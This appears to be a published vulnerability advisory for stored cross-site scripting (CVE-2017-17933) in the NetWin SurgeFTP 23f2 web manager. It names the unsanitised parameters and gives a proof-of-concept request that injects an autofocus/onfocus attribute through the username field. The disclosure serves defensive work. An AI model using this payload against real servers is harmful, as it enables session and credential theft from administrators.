NetWin SurgeFTP 23f2 Cross Site Scripting
Posted on 29 December 2017
# Exploit Title: Multiple stored Cross-site scripting in NetWin SurgeFTP version 23f2 # CVE: CVE-2017-17933 # Date: 27-12-2017 # Exploit Author: Aloyce J. Makalanga # Contact: https://twitter.com/aloycemjr <https://twitter.com/aloycemjr> # Vendor Homepage: http://netwinsite.com <http://netwinsite.com/> # Category: webapps # Attack Type: Remote # Impact: Code execution 1. Description cgi/surgeftpmgr.cgi (aka the Web Manager interface on TCP port 7021 or 9021) in NetWin SurgeFTP version 23f2 has stored XSS via the classid, domainid, or username parameter. This is because user-supplied inputs are not sanitized. The attacker-supplied code can perform a wide variety of actions, such as stealing the victimas session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystroke. 2. Proof of Concept http://<target IP address?/cgi/surgeftpmgr.cgi?domainid=&info=&choose_domain=win-0rlsd5c98mp&username=adminh737a%22onfocus%3d%22alert(1)%22autofocus%3d%22ib2cr&password=admin&usergroups=admin&ftpquota=admin&cmd_user_create.x=65&cmd_user_create.y=6 <http://www.example.com/cgi/surgeftpmgr.cgi?cmd=log&domainid=0&fname=> 3. Solution: No solution available at this time.